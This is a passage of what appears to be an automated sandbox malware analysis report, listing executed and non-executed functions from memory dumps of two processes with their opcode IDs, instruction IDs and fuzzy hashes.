                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction ID: 3de3e55db9ffd38b59860a5760cf81d535eda5b52cb0bd577d59d4d1cdc8560f
                                                                                                                            • Opcode Fuzzy Hash: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction Fuzzy Hash: BED02230B50E040FC70CA63C8C98C703390EBAA20378100ACD00BC72B1D92ADC89C740
                                                                                                                            Function 00007FFD9B786F10 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction ID: 96459cc03289447f672a929809153bcad38ec1426e449cebc560d9455d7c56e3
                                                                                                                            • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction Fuzzy Hash: 59D02230B51D040FC70CE63C88988307390EB6A2037C100A8D00BC72B1E92ADC88C781
                                                                                                                            Function 00007FFD9B750D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: d13d39a6bcb6e22f33fd5431c04bc28ba79635e90f3539f56ae3d56a3e3403f4
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: CFE01234B0930ECBE710DBD4C4946ED7761EB52711F104765C401872E9DAB86785C680
                                                                                                                            Function 00007FFD9B7682FE Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 35d6aead272d1ee6e2c71fd383b2776b5cf1514df1070b7ec21824df4768ecb5
                                                                                                                            • Instruction ID: 250183c41128ea5ecd8d4b9ba0d81326a196b8d432636eca6e7471725ad9da20
                                                                                                                            • Opcode Fuzzy Hash: 35d6aead272d1ee6e2c71fd383b2776b5cf1514df1070b7ec21824df4768ecb5
                                                                                                                            • Instruction Fuzzy Hash: 7FE0E630E0961DCFE7709754C8587AC7161BB04304F9503F5C00DA31E5CB796D819B41
                                                                                                                            Function 00007FFD9B7644BD Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3cb9fe7cd24bb62babd8b28f507318ac12ca478d6f9e3cd8c379e13c68eb3c7e
                                                                                                                            • Instruction ID: 72478a107366106f3e0161648be1fd4478f1252bd2872e412405ea5cb4d2f088
                                                                                                                            • Opcode Fuzzy Hash: 3cb9fe7cd24bb62babd8b28f507318ac12ca478d6f9e3cd8c379e13c68eb3c7e
                                                                                                                            • Instruction Fuzzy Hash: 82D09E70E2891ECEEB58EF94CC65ABD7AB1BF44304F500175E429972DADF3829014741
                                                                                                                            Function 00007FFD9B754960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 90ac5ca60c1108020624c25f68086815964e86ecf3c7e36c751fa902e45589bb
                                                                                                                            • Instruction ID: 52949092ecd301542e3a18db742734fabd7890190eabc9ec39ba6e725e149b21
                                                                                                                            • Opcode Fuzzy Hash: 90ac5ca60c1108020624c25f68086815964e86ecf3c7e36c751fa902e45589bb
                                                                                                                            • Instruction Fuzzy Hash: E6C08C00F1CD1A07F75A6644083027D08029B40209F8003B0E41F833CECD0C1E0252CB

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7606FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =O_^$O_^%$O_^($O_^*$O_^+$O_^2$O_^4
                                                                                                                            • API String ID: 0-1144829533
                                                                                                                            • Opcode ID: 03eb7240857c03567af660c11229dada03b1914302d4cc996b80e2e0ed084274
                                                                                                                            • Instruction ID: acfe2133a43534197fa9225e4a42b6d4af8a191dd5ac6861501ef6ecb7d7a26b
                                                                                                                            • Opcode Fuzzy Hash: 03eb7240857c03567af660c11229dada03b1914302d4cc996b80e2e0ed084274
                                                                                                                            • Instruction Fuzzy Hash: F751A06BA8C5264DE31936A935A68FD2701CF61339B0846B3F12F890DB8E1CA58249D9
                                                                                                                            Function 00007FFD9B76063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =O_^$O_^($O_^*$O_^+$O_^2$O_^4
                                                                                                                            • API String ID: 0-1414841115
                                                                                                                            • Opcode ID: d1e859de2480af89a4543a257c3e131afaf5548c6e9f22779e9cc65396ea26a7
                                                                                                                            • Instruction ID: 58199088c9f430d12496dbb14553b357cab811ba19f35a99cbdc02998c29dbcb
                                                                                                                            • Opcode Fuzzy Hash: d1e859de2480af89a4543a257c3e131afaf5548c6e9f22779e9cc65396ea26a7
                                                                                                                            • Instruction Fuzzy Hash: DC81021BB8C6260CE31977BD75A29FD3701DFA0339B0846B7F26E8D0D78E18648649D5
                                                                                                                            Function 00007FFD9B7606D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1864106614.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: O_^*$O_^+$O_^2$O_^4
                                                                                                                            • API String ID: 0-1903236095
                                                                                                                            • Opcode ID: 4c5a03f62680949554501724d4e494dd37597d82a14b312b0fd727cf9694b357
                                                                                                                            • Instruction ID: e7060d3b81791bc6cbfb82b01157a7e46995fb60fae9eafeedcfa8aa2e71ec8a
                                                                                                                            • Opcode Fuzzy Hash: 4c5a03f62680949554501724d4e494dd37597d82a14b312b0fd727cf9694b357
                                                                                                                            • Instruction Fuzzy Hash: A051AF2BB8C5260DE31977B935A68FD2701CF61339B0886F7F16F8D0DB4E18658249D9

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B790D48 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5X_H
                                                                                                                            • API String ID: 0-3241812158
                                                                                                                            • Opcode ID: ab736901c4c51d958db0a01db090052baeaadde05f4cae71a218517eac586e21
                                                                                                                            • Instruction ID: 3680aaacee62593878ee65412b027c6aebcb77e245f3217b0db5355e54f1b19a
                                                                                                                            • Opcode Fuzzy Hash: ab736901c4c51d958db0a01db090052baeaadde05f4cae71a218517eac586e21
                                                                                                                            • Instruction Fuzzy Hash: 5C91C2B5A2AA8D8FE759DB688875BA97FE1FF55310F0101BAD04AC73E2DB781410C741
                                                                                                                            Function 00007FFD9B79116D Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 0-2852464175
                                                                                                                            • Opcode ID: a6c8e16eb00d46b74dd6f607776de4619b2b8c863968724705b1e34d325360db
                                                                                                                            • Instruction ID: ddc01a5a76cf84114afca0839fffe59f25837baac7b64406586299a69e1d08e8
                                                                                                                            • Opcode Fuzzy Hash: a6c8e16eb00d46b74dd6f607776de4619b2b8c863968724705b1e34d325360db
                                                                                                                            • Instruction Fuzzy Hash: B5318431B0964E9FDB45EB68C864EB977F1FF69300F0506BAD009D72B2DA38A945CB50
                                                                                                                            Function 00007FFD9B7908D0 Relevance: .2, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2d504a0e2732167007b5d77c6742393b6b83c1afbacf5e320bd1ab460443bf02
                                                                                                                            • Instruction ID: 47a92274988119e0e0edcda273cc929565f40db25689674af3312f16a238710b
                                                                                                                            • Opcode Fuzzy Hash: 2d504a0e2732167007b5d77c6742393b6b83c1afbacf5e320bd1ab460443bf02
                                                                                                                            • Instruction Fuzzy Hash: AC414826B4D6590EE309B7BCA0B5AFC7782DF45321B1405FBE40EC71EBDE14A8418280
                                                                                                                            Function 00007FFD9B790910 Relevance: .1, Instructions: 148COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 19de31512fb564f9215d20795997a16d197c378215786e5a9cd8871a58f87418
                                                                                                                            • Instruction ID: 71dc2705b32940350986447cd5cae499cdf967acc6019425f3778551e1640c6a
                                                                                                                            • Opcode Fuzzy Hash: 19de31512fb564f9215d20795997a16d197c378215786e5a9cd8871a58f87418
                                                                                                                            • Instruction Fuzzy Hash: E4414A26B5D6590EE309B77CA0A69FC7782EF59320B1505FBE40EC72FBDE14A841C684
                                                                                                                            Function 00007FFD9B790960 Relevance: .1, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 65a7ee47f29697c1a3af2861ca87474b918e72be8bb433bc28dd43e6eec317e8
                                                                                                                            • Instruction ID: 12f43830553d1365ae79986ab68f65c9e645881071818d80697ea3bb7955afb2
                                                                                                                            • Opcode Fuzzy Hash: 65a7ee47f29697c1a3af2861ca87474b918e72be8bb433bc28dd43e6eec317e8
                                                                                                                            • Instruction Fuzzy Hash: 4131F826B5DA1D0FE758B76CA466AFC73C2DF58321B1505FAE40EC32EBDD18AC418284
                                                                                                                            Function 00007FFD9B790998 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 955ef7310b841266f11ee2b3ae5d197a463d880611be557397504d6901e6a64a
                                                                                                                            • Instruction ID: 844c1d0c1b87657f5ca09bcfec45e10293a1b81f7acedb42ba9f829c60ba4d88
                                                                                                                            • Opcode Fuzzy Hash: 955ef7310b841266f11ee2b3ae5d197a463d880611be557397504d6901e6a64a
                                                                                                                            • Instruction Fuzzy Hash: 6A21F225B2AA1D0FE798A76C94A9A7973C2EB98211F4101B9E80EC33F6DD14EC418281
                                                                                                                            Function 00007FFD9B790C25 Relevance: .1, Instructions: 81COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 62b3b704f414ae061f620174e2c34387a21ce33fc6be4b269be1fbecf350f9ee
                                                                                                                            • Instruction ID: 2f6594a51eace097bc51fcc614691becaf696678e6d8f2ac60f899a35315858f
                                                                                                                            • Opcode Fuzzy Hash: 62b3b704f414ae061f620174e2c34387a21ce33fc6be4b269be1fbecf350f9ee
                                                                                                                            • Instruction Fuzzy Hash: 3C210836B1D74D8FE722A7A898210EC7B60EF52321F1542F3D0588B1E3DA38264AC781
                                                                                                                            Function 00007FFD9B796872 Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 137b275f416e6bb4ddcfae7533393b05f3ec73a1594eee35fd541f90ac801162
                                                                                                                            • Instruction ID: 6966be42a528163f00c92d5cb7ce45749e627ef7a5eb38e21f4949e761f45349
                                                                                                                            • Opcode Fuzzy Hash: 137b275f416e6bb4ddcfae7533393b05f3ec73a1594eee35fd541f90ac801162
                                                                                                                            • Instruction Fuzzy Hash: 43118621E1DA1D4FEBB4E7588475AB87290FF18740F5203F9D84EE72B2EE28AE444740
                                                                                                                            Function 00007FFD9B790C38 Relevance: .1, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5f1c5c531c760f9d36f7bccb5f40e6b86177becf5a7371601c4810ecf9667849
                                                                                                                            • Instruction ID: 1ea4e74597d313722961f5430d2940b62c6003f27dc8686e4a2bc9e9a130c0c7
                                                                                                                            • Opcode Fuzzy Hash: 5f1c5c531c760f9d36f7bccb5f40e6b86177becf5a7371601c4810ecf9667849
                                                                                                                            • Instruction Fuzzy Hash: EF11C235B1E78D8FE722DBA888611EC7BB0EF52710F0645B7C044DB2F2E93816498781
                                                                                                                            Function 00007FFD9B790C48 Relevance: .0, Instructions: 40COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a776cb54256622e0b18e82c3fa9fbd69612ed2c9c8c5d1f787b6db49328ddbfb
                                                                                                                            • Instruction ID: cb0127cf49636d18a9747d1a48e0a5da7a6b9c8acaf45b856d85e1162d9815e5
                                                                                                                            • Opcode Fuzzy Hash: a776cb54256622e0b18e82c3fa9fbd69612ed2c9c8c5d1f787b6db49328ddbfb
                                                                                                                            • Instruction Fuzzy Hash: 53019E35A1E38D8FD722DBA488600DCBFB0AF42310F1642E7D040DB2B6EA385A48C781
                                                                                                                            Function 00007FFD9B7969C4 Relevance: .0, Instructions: 39COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction ID: 975cc5f4cf6df5d77ccaab99c17d7957b636be1816eaf17ba19bdfc777df694d
                                                                                                                            • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                            • Instruction Fuzzy Hash: 7D018630A1951E4EEB78E640D865BF873A0FB54340F1103FAC44EE31B2EE286E818B41
                                                                                                                            Function 00007FFD9B795E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 420e4002791dd227017f9c95c078b8f83bfa9c5a82e70b9a3bd2b847ad4b8642
                                                                                                                            • Instruction ID: 6435382d5b5b9fa0ee340e08075b3a93f0855d1192f94f65267c2cfbcdf64961
                                                                                                                            • Opcode Fuzzy Hash: 420e4002791dd227017f9c95c078b8f83bfa9c5a82e70b9a3bd2b847ad4b8642
                                                                                                                            • Instruction Fuzzy Hash: 6CF0C231648A198FCF54DF04C494FA973B1FB98311F1586A9D00ED7260DA34AA85DF81
                                                                                                                            Function 00007FFD9B790C50 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: df04e4ba7b01e55efc32ed84598781c01fb40490e79107f00f38dd20b81e97c7
                                                                                                                            • Instruction ID: bd1a799309b3ee4460f41cf0d3a13751bfa41731a07b69fafcec97f28d6f6d0d
                                                                                                                            • Opcode Fuzzy Hash: df04e4ba7b01e55efc32ed84598781c01fb40490e79107f00f38dd20b81e97c7
                                                                                                                            • Instruction Fuzzy Hash: 41018F34A1E38D9FE722DBA488644DCBFB0AF12300F1542E7D044DB2A6EA385B44C741
                                                                                                                            Function 00007FFD9B7968B1 Relevance: .0, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction ID: ea0050208053390b8f96df417b1942717b4b1fbaf9c49b396530284035678fdd
                                                                                                                            • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                            • Instruction Fuzzy Hash: 68F09030A1960E4AEBB8E644D465AF83391EF04340F1103B9D84EE32B2DE28BE954741
                                                                                                                            Function 00007FFD9B791DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction ID: fb9914175c49bcab517e9322b85a582d64188f462d8d1e5aa14fd00adef2ff5a
                                                                                                                            • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                            • Instruction Fuzzy Hash: 63E01A75F0E61E87F768A288C8617ED7265EB88300F150278DA1E933E1CE28AE418655
                                                                                                                            Function 00007FFD9B790D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: e4662e0a70e2736ddce9274c65f865325f5217b8c5ee3bb113f8465ada92650c
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: EDE01234B1930ECBE710DB94C4946ED7761EB51721F104365D411872E9DA786784C680
                                                                                                                            Function 00007FFD9B790B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction ID: 1558bd06868f7e4fa42920646ab968c1a793dd7962b5b0a6fabd7fad58b1f95c
                                                                                                                            • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                            • Instruction Fuzzy Hash: 0FC0123062990E8FDA40BB28C888824BBA0FB0E301BEA14E0E00CCB1B1E61999948701
                                                                                                                            Function 00007FFD9B7906A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_28_2_7ffd9b790000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction ID: 641e102772d0e1531188c6cc684c38bef64c5b325b7f6178fec90438a5b00856
                                                                                                                            • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                                                                                                            • Instruction Fuzzy Hash: EFC04C06F6B71F01F53571EE54660ADB1405FD5E60FD70373D50D801F19D4E22D50156
                                                                                                                            Function 00007FFD9B7912B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.1880681674.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
